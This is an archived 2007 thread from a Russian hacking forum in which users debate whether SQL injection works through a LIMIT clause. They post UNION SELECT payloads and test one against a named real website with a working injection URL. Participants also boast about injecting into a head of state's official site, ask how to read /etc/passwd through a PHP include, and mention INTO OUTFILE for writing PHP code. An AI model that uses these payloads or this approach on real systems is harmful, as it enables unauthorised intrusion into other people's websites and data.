ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.12.2007, 00:30
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Через лимит инъекция не проводится
|
|
|
11.12.2007, 00:36
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Basurman
Через лимит инъекция не проводится
давай на 10 рублей поспорим?
Вот скажи есть такой запрос
Код:
SELECT bla1,bla2 FROM bla LIMIT 1,[inject]
что тебе мешает достроить запрос до такого:
Код:
SELECT bla1,bla2 FROM bla LIMIT 1,0 UNION SELECT 1,2
__________________
Кто я?..
|
|
|
|
11.12.2007, 00:44
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Сообщение от I-I()/Ib
http://bghotelite.com/rent-a-car.php?grad=bg&page=45/*
ну и дальше перебираем количества полей с помощью UNION SELECT 1,2,3... и тд...
Иньекция в лимите возможна и очень легко проводима... другой вопрос в лимите ли она... но судя по всему в лимите
Дошел до 20 и дальше уже в лом  По непонятным мне причинам я наехал сегодня на БГ  Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =)))
|
|
|
|
11.12.2007, 00:44
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Начальная страница - первый параметр ))))
А второй по сколько выводим, а такое вот:
limit 0/* - нифига не пашет
Последний раз редактировалось Basurman; 11.12.2007 в 00:46..
|
|
|
|
11.12.2007, 00:52
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Basurman
Начальная страница - первый параметр ))))
А второй по сколько выводим.Пример в студию работающий со вторым параметром (хоть 1)
Спасибо большое что сказал насчет первого параметра если б не ты  ...
Я привел пример... ну подумаешь в данном случае пример запроса изменится
Код:
SELECT bla1,bla2 FROM bla LIMIT [inject],10
ничего собственно не меняется:
Код:
SELECT bla1,bla2 FROM bla LIMIT 0 UNION SELECT 1,2/*,10
ЗЫ пжлст пиши понятней а то с 3-его раза врубился в то что ты хотел сказать...
Сообщение от Basurman
limit 0/* - нифига не пашет
пашет:
http://bghotelite.com/rent-a-car.php?grad=bg&page=0/*
__________________
Кто я?..
|
|
|
|
11.12.2007, 01:01
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от ~EviL~
Дошел до 20 и дальше уже в лом По непонятным мне причинам я наехал сегодня на БГ Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =))) Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...
__________________
Кто я?..
|
|
|
|
11.12.2007, 01:05
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Спасибо, было поучительно =)) +
|
|
|
|
11.12.2007, 01:46
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от I-I()/Ib
Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...
Так обычно и бывает, в limit невозможно использовать выражения, возможно только Into outfile вставить (я про слу чай когда order by используется), еслиб можно постить какието вещи типа в название записать строчку пхп кода, которая комманды позволяет использовать тогда да, но при этом кавычки не должны экранироваться и есть файл прмв, но такое еще реже
__________________
Карфаген должен быть разрушен...
|
|
|
|
11.12.2007, 21:58
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
SQL + PHP injection ?
У меня вопрос. Попалась такая ошибочка:
Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290
Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:
Код HTML:
http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
|
|
|
|
11.12.2007, 22:06
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от ~EviL~
У меня вопрос. Попалась такая ошибочка:
Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290
Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:
Код HTML:
http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
Почитай немного статей (лучше много) про инклуд и скуль инж, тогда ты может быть поймёшь разницу.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
